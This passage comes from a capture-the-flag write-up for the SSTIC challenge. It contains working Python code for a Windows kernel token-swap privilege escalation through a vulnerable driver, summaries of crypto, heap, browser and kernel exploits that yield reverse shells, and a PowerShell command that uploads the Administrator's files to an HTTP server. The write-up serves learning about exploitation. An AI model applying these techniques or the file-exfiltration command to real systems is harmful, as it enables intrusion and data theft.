By iterating over this list, we can locate the address of the kernel PROCESS structure for any subprocesses we create. We can also leak the addresses for any TOKEN handles held by the System process, and at least one of these tokens is likely to be a high-privilege token. All we need to do is create subprocesses until one of them is allocated within the OOB window, then use our OOB write to write a high-privilege token into its PROCESS structure: no need to muck around with shellcode, ROP, SMAP/SMEP, or any fancy ioring exploits.
The actual exploit then becomes quite straightforward:
def get_handles():
objtypes = NtQueryObject_ObjectTypesInformation()
types_by_id = {}
handles_by_type = {}
for t in objtypes:
types_by_id[t.TypeIndex] = t.TypeName
handles_by_type[t.TypeName] = []
handles = NtQuerySystemInformation_SystemHandleInformation()
for h in handles:
handles_by_type[types_by_id[h.ObjectTypeIndex]].append(h)
return handles_by_type
handles = get_handles()
my_pid = os.getpid()
def get_address_of_pid(pid):
h = OpenProcess(PROCESS_QUERY_LIMITED_INFORMATION, False, pid)
try:
for handle in get_handles()["Process"]:
if handle.UniqueProcessId == my_pid and handle.HandleValue == h:
return handle.Object
finally:
CloseHandle(h)
def exec_cmd(args):
proc = subprocess.Popen(args, stdin=subprocess.PIPE, stdout=subprocess.PIPE)
addr = get_address_of_pid(proc.pid)
if addr is None:
print("none??")
proc.kill()
return None
print(proc.pid, hex(addr))
return (proc, addr)
while 1:
proc, addr = exec_cmd(["cmd.exe"])
if port_addr < addr < port_addr + (1 << 32):
break
print("GOT IT!")
# make a guess for the System token
tokh = handles["Token"][1]
# _EPROCESS::Token is an `_EX_FAST_REF` pointer, so add 5 here for the RefCnt field
write_rel(port, addr - port_addr + 0x358, pack("<Q", tokh.Object + 5))
def s2p(p: subprocess.Popen):
while True:
data = sys.stdin.buffer.read(1)
if len(data) > 0:
p.stdin.write(data)
p.stdin.flush()
elif len(data) == 0:
break
def p2s(p: subprocess.Popen):
while True:
if p.poll() is not None:
break
sys.stdout.buffer.write(p.stdout.read(1))
sys.stdout.buffer.flush()
def interact(p):
threading.Thread(target=p2s, args=(p,), daemon=True).start()
s2p(p)
interact(proc)
The full exploit code can be found in exploit.py
. When run, it reliably pops a SYSTEM-privileged shell after a short delay, which we can then use to poke around the Administrator's files.
Once I got a "root" shell on the box, I downloaded all of the files in the Administrator directory using a file-receiving HTTP server and the Invoke-RestMethod -Uri $uri -Method Post -InFile $uploadPath -UseDefaultCredentials
PowerShell utility. All the files I downloaded can be found in the final
directory.
Poking around the files, I stumbled upon Voice-Note-001.mp3
. This starts off with just the sound of a dog barking, but five seconds in changes to a bunch of strange warbling noises.
Viewing this file in Audacity reveals a message visually encoded in the spectrogram:
There's the email address we need to complete the challenge: 3bdb7ed68816649b@sstic.org
. Mission accomplished!
This is a quick summary of the solution; for details, consult the relevant sections of the writeup.
-
Prologue
- Import the database dump into a TeslaMate instance
- Use the Grafana "Drive Stats" dashboard to obtain the top destinations and reveal the hidden URL: http://163.172.99.233:8080.
-
Chapter 1
- The client and server communicate using unauthenticated AES-128-CBC, which renders them vulnerable to bitflip manipulations from a man-in-the-middle; verbose plaintext error messages enable decryption (and thus encryption, due to the CBC construction) of arbitrary messages in either direction
- Start an instance and fill in
config.py
with the server host/ports and your tunnel information - Run
mitm.py
until the client sends a 97-byte message - Use
decrypt_message
indecrypt_client.py
to decrypt this message, extracting the session ID (first 8 bytes) and credentials (64 hex character payload), putting them inconfig.py
- Run
test4_actkey.py
to obtain the activation key. - Enter this activation key to find the next URL: http://163.172.99.233:8080/PR2YU5CZGCYMS272GLZ1WA43W7P44I7S.
-
Chapter 2
- The client has a use-after-free vulnerability which can be exploited by a second malicious client.
- Start an instance, and put the host/port info in
my_protocol.py
. Start a reverse shell listener and put its host/port inexploit.py
. - Run
exploit.py
. This takes a few minutes; if it gets stuck for more than a minute with no output, kill it and try again (this can happen if the server unluckily does not spawn a green shard in time). Once it finishes, you should have a reverse shell. - Read
memo.txt
to find the next URL: http://163.172.99.233:8080/956a07cd264c1df26beedcef1b3187ad.
-
Chapter 3
- The HSM has a backdoor which allows faults to be surgically injected into an HMAC-SHA256 signature calculation. A system of boolean equations can solved to derive intermediate HMAC state from multiple faulty signatures.
- Run
collect.py
to collect enough faulty signatures from the server. - Run
solve1.py
to solve for the internal state of the HMAC calculation. This takes a few minutes to run. - Insert the
c1
andc2
values intosolve2.py
and run it to post a forged message to the chat application. Forgery is achieved by using these bits of the HMAC state to perform a length extension attack. - Read the BOSS's reply to your message to get the next URL: http://163.172.99.233:8080/1616c662849ee18fa8ad0f370fd6e5ac.
-
Chapter 4
- The patched Chromium ships with a vulnerable JS-exposed extension module that provides an arbitrary read primitive, upgradable to an arbitrary write with a bit of extra work. With an arb read/write, it's fairly easy to get shellcode execution.
- Launch a reverse shell listener. Fill in the shellcode in
exploit.html
. - Fill in the instance URL in
submit.py
, then run it. It should say that "I received your page, I'm currently testing it.". Shortly thereafter you should see a reverse shell connection. - Read
flag_step4.txt
to get the next URL: http://163.172.99.233:8080/ad51f6d07dd762921092554df7af530a.
-
Chapter 5
- The
netshdw.sys
driver tries to prevent a local port from being created with both Recv and Send capabilities, but the check is vulnerable to a race condition. Once such a local port is created, a type confusion between received and delayed-send packets can be leveraged to obtain OOB read/write up to 4GB past the end of the port structure. - We can leak the address of processes and tokens via the
NtQuerySystemInformation - SystemHandleInformation
Windows API. We spray processes until one is allocated within the OOB window, then overwrite its Token field with a leaked high-privilege token to gain code execution as SYSTEM. - Upload both
my_winapi.py
andexploit.py
to the server, then runexploit.py
. It should spawn a SYSTEM-privileged command window.
- The
-
Final Step
- Download
C:\Users\Administrator\personal\Voice-Note-001.mp3
. - Open this file in Audacity and switch to the Spectrogram view to see an email address.
- Send an email to complete the challenge.
- Download
Here's an approximate timeline of my solution process, reconstructed via web browsing history, shell history and file timestamps. All times are local (GMT-7). Note that Friday 3/29 to Monday 4/1 was a long weekend, which gave me some extra time to work with.
- 3/29 8:36am: Start the challenge: download the package and start looking at the database dump in a text editor
- 3/29 8:41am: Start looking through teslamate source code to see if the encrypted tokens are any use (conclusion: no)
- 3/29 8:55am: Give up trying to read the dump by hand and decide to just install TeslaMate
- 3/29 9:07am: Import the dump using postgresql manually, encountering many errors because I didn't drop the tables first
- 3/29 9:11am: Wipe everything and reimport again using the instructions from the TeslaMate docs
- 3/29 9:15am: Poking around the various Grafana dashboards and looking at maps
- 3/29 9:29am: Notice that the top destinations on the drive stats dashboard has
Domicile_http_163
listed first, and connect the dots to the police report - 3/29 9:34am: Submit prologue flag.
- 3/29 9:43am: Experiment with sending bitflipped messages to the server.
- 3/29 10:01am: Start implementing the padding oracle attack.
- 3/29 10:30-11:30am: Take a meeting. Have
mitm.py
log packets in the background. - 3/29 12:00pm: Implement a caching layer to speed up decryption.
- 3/29 12:20pm: Can now encrypt arbitrary messages to the server. Experiment with sending various messages to the server and seeing the responses.
- 3/29 2:20pm: Start working on capturing clients and communicating with them.
- 3/29 2:51pm: Experiment with bit-flipping server messages to the client, which helps determine what some of the messages mean. Decrypt one server message via bitflips and guessing.
- 3/29 3:19pm: Finally have the client log fully decrypted. Start working on decrypting server traffic using the same JSON approach and our previously-decrypted server message.
- 3/29 3:29pm: Server traffic decryption is working. Start decrypting all logged messages so we fully understand the protocol.
- 3/29 3:56pm: Start implementing the final script to obtain an activation key.
- 3/29 4:10pm: Submit chapter 1 flag.
- 3/29 4:16pm: Figuring out how to get a visible display from the challenge.
- 3/29 5:30pm: Reversing the client.
- 3/29 6:42pm: Distracted by the xz backdoor news.
- 3/29 8:00pm: Continue reversing. Start putting together my own (Python) client for the game.
- 3/29 9:30pm: Experimenting with a few ideas, such as double-free (tcache vs fastbin). Run into a lot of ugly crashes.
- 3/30 12:32am: Go back to reversing the client in more depth.
- 3/30 1:45am: Re-read how2heap to remind myself which techniques glibc 2.35 is vulnerable to
- 3/30 2:17am: Try a different approach: use the refcount to decrement integers
- 3/30 4:37am: Hit on the idea of "decrementing" part of the local player enough to free it
- 3/30 5:35am: Start putting together the ropchain
- 3/30 6:07am: Fire the exploit at the actual server. Reverse shell connects five minutes later.
- 3/30 6:14am: Submit chapter 2 flag.
- 3/30 6:16am: Poke around the chapter 3 challenge, but decide to sleep.
- 3/30 11:44am: Start implementing the backdoored SHA-256 in Python for easier experimentation.
- 3/30 1:39pm: Using GDB on QEMU to confirm the order in which
vsetvl
/vsha2c
are called from the HSM. - 3/30 2:42pm: Start trying to use z3 to solve for the IHV. I ran two copies of the script, and they never finished even hours later.
- 3/30 3:08pm: First aborted attempt to install Boolector from source, but getting errors. Try CVC5 instead because I have that installed already.
- 3/30 3:22pm: CVC5 also takes forever to run. Decide to just get Boolector to build.
- 3/30 3:32pm: After wrestling with the build, I finally got something working. Boolector is fast!
- 3/30 4:55pm: I have most of the IHV recovery attack written. Write
collect.py
to start collecting signatures for the final attack. - 3/30 5:13pm: Refactor my attack to reduce duplication (
FaultInjectionSolver
class). Finish implementing the rest of the attack with locally-collected data. - 3/30 5:53pm: I have
c1
andc2
for the remote server. Start implementing the length extension attack. - 3/30 6:13pm: Submit chapter 3 flag.
- 3/30 6:33pm: Decide I'm going to work on my (ancient) Windows desktop computer instead of trying to do everything on a slow Windows 10 VM. Unfortunately, this means that my timeline will be less detailed as I do not have as much logging on that machine.
- 3/30 7:02pm: First experimentations with the exposed authentication API.
- 3/30 8:22pm: Start setting up debugging. Need to use the new WinDbg because my old WinDbg won't handle 4GB+ PDBs.
- 3/30 8:46pm: Thinking about doing the race condition to get arbitrary write. Sounds hard.
- 3/30 9:55pm: Experimentations with shellcode. I am nowhere near getting a working exploit yet, but I know I will probably want shellcode eventually, and I have no familiarity with Windows shellcode.
- 3/30 10:03pm: Fight with my antivirus, which seems to hate the Metasploit payload :)
- 3/30 11:54pm: Learning about the cppgc caged heap.
- 3/31 12:26am: Start putting together the arb write exploit.
- 3/31 12:42am: vtable overwrite is stymied by control flow guard.
- 3/31 1:13am: Arb write works, but I don't know how to get RCE. Time to dump the memory regions.
- 3/31 1:44am: Look through the results. Find out about
g_main_thread_stack_start
- nice! - 3/31 3:08am: While looking for VirtualProtect in the Chromium codebase, accidentally stumble upon
ModifyCode
- this function is perfect! - 3/31 3:13am: Start looking for ROP gadgets to call
ModifyCode
. - 3/31 4:18am: Trying to figure out the submitter.
- 3/31 4:26am: Submit chapter 4 flag.
- 3/31 4:30am: Take a quick look at the next challenge's files.
- 3/31 4:44am: Open
netshdw.sys
in Ghidra, see how much code it is, and decide to sleep. - 3/31 11:17am: Start reversing
netshdw.sys
. Learn about the various WDM functions and structures. - 3/31 11:48am: Start learning about NDIS protocol drivers and reversing the NDIS functions in the driver.
- 3/31 2:12pm: Start learning about IoCsq as I am reversing the CSQ structures.
- 3/31 3:19pm: Have most of the driver reversed at this point. Switch to learning about exploit strategies to figure out what kind of bug I might want.
- 3/31 3:40pm: From chompie1337's exploit of CVE-2023-21768, learn that a single arb write is enough to gain privilege escalation via ioring.
- 3/31 5:57pm: Try to get the VM running with QEMU and a VNC display (since my Linux VM is headless).
- 3/31 6:22pm: Can't seem to log in as either user, even though I'm sure I'm entering the password correctly. I was about to bug the organizers, but decided to first try resetting the password using guestfish.
- 3/31 6:39pm: Guestfish hack involves just opening cmd.exe on boot, and as soon as I do, I realize the keyboard layout is set to AZERTY. No wonder logging in didn't work. Figure out how to change it to QWERTY.
- 3/31 7:44pm: Learning about kernel development and debugging.
- 3/31 8:31pm: Start wrapping the Windows API with Python.
- 3/31 9:04pm: Start experimenting with the
netshdw
driver from Python code. - 3/31 9:22pm: Back to reversing the driver.
- 3/31 11:33pm: Done reversing for now. Try and see if I can send a raw ethernet frame.
- 4/1 12:01am: Try and get Wireshark to work in the VM. Waste a lot of time and never get it working.
- 4/1 12:45am: Implementing the exploit for the race condition.
- 4/1 1:39am: Implemented the arb read and got chunks of the IO_CSQ structure. Learn about the undocumented structure of IO_CSQ. Realize that the function pointers give us the base address for
netshdw
. - 4/1 2:08am: Dump out ROP gadgets for
netshdw
. Nothing immediately stands out as being useful. Sleep. - 4/1 4:57pm: After a day of work (on a long weekend!), we're back at it. Start setting up kdnet kernel debugging.
- 4/1 5:33pm: QEMU performance (running on a headless Linux VM in VMWare Fusion) is abysmal, so this is really painful to work with. Try UTM to see if I can get something faster on my Mac.
- 4/1 6:10pm: Give up on UTM because it doesn't support the right options.
- 4/1 6:15pm: Implementing
get_handles
in Python using the SystemHandleInformation API. - 4/1 8:05pm: Experimenting with getting token handle information from the Windows API, because I want to check what privileges a given token has
- 4/1 8:32pm: Try seeing if any existing process is in the OOB window. None are.
- 4/1 8:57pm: Decide to just create processes of our own instead of relying on the existing ones.
- 4/1 9:48pm: Can't seem to get any processes allocated in the OOB window.
- 4/1 10:13pm: Chasing down lots of false leads about trying to execute shellcode, forge IRPs for write-what-where, etc.
- 4/1 1:34am: New idea: don't kill subprocesses immediately. This quickly yields a process within the OOB window!
- 4/1 2:43am: Run exploit on the remote server.
- 4/1 2:45am: Submit chapter 5 flag.
- 4/1 2:47am: Setting up a janky HTTP server to receive files
- 4/1 3:01am: Trying to see if there's anything hidden in the files from
confidential
. Nothing. - 4/1 3:12am: Grab all of the files in
personal
too. - 4/1 3:18am: After hearing weird noises in the voice note, open it in Audacity and check the spectrogram.
- 4/1 3:22am: Email
3bdb7ed68816649b@sstic.org
to complete the challenge!
This was, as usual, quite a ride! I think my favorite challenge is the HMAC-SHA256 forgery - it's very cool that a targeted fault injection on the outer SHA256 is sufficient to forge HMACs via length extension. I also learned a lot about browser and Windows kernel pwn, which are popular targets these days!
This year's challenges were markedly harder than any prior year, which I really appreciated. I spent quite a long time working on the Windows kernel pwn, but the result felt very rewarding, especially as that was my first experience doing anything with the Windows kernel. Thanks SSTIC again for putting on a great challenge!